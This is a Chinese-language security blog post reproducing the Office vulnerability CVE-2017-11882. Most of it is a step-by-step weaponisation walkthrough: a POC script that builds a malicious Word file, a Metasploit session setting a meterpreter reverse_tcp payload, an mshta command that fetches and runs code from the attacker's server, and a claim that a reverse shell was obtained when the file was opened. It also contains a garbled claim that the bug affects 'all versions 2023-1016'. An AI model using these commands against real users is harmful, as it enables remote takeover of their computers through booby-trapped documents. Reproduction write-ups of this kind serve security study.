漏洞介绍

2017年11月14号,微软推送了常规的安全更新,其中CVE-2017-11882的安全更新隐藏了17年之久,其利用效果更是2023-1016所有版本通吃,相当可怕。利用起来只需要构造好带有后门的Office文件,当用户打开文件时黑客就可以对其进行利用。

简单复现

这里举了一个特别简单的方式,利用POC生成Word文件,这里以弹出计算器为例。

python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc  #生成test.doc文件

打开效果:

Kali利用

先将rb文件拷入以下目录中
/usr/share/metasploit-framework/modules/exploits/windows/smb

开始利用:

msfconsole #启动MSF
reload_all #重新加载所有模板

msf5 >> use exploit/windows/smb/cve_2017_11882 #使用该模块
msf5 exploit(windows/smb/cve_2017_11882) >> set uripath 11882 #设置路径
uripath =>> 11882
msf5 exploit(windows/smb/cve_2017_11882) >> set payload windows/meterpreter/reverse_tcp #设置payload
payload =>> windows/meterpreter/reverse_tcp
msf5 exploit(windows/smb/cve_2017_11882) >> set lhost 192.168.1.10 #设置监听IP
lhost =>> 192.168.1.10
msf5 exploit(windows/smb/cve_2017_11882) >> run #执行
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.1.10:4444 
[*] Using URL: http://0.0.0.0:8080/11882
[*] Local IP: http://192.168.1.10:8080/11882
[*] Server started.
[*] Place the following DDE in an MS document:
mshta.exe "http://192.168.1.10:8080/11882"

构造文件,其中地址为上边Kali生成的地址

python Command109b_CVE-2017-11882.py -c "mshta http://192.168.1.10:8080/11882" -o Kali_Hack.doc

打开构造的Word文件,已经反弹了Shell

Armitage中也发生了变化

可以执行一些命令了,你懂得

本文所用文件下载

正文到此结束

本文标题:CVE-2017-11882漏洞复现

本文链接:https://www.hantaosec.com/1846.html

除非另有说明,本作品采用知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议

声明:转载请注明文章来源及链接,不带链接禁止任何转载!访问任何网络安全相关文章,则视为默认接受网络安全文章免责声明 ,请认真阅读。

喜欢我的文章吗?
别忘了点赞或赞赏,让我知道创作的路上有你陪伴。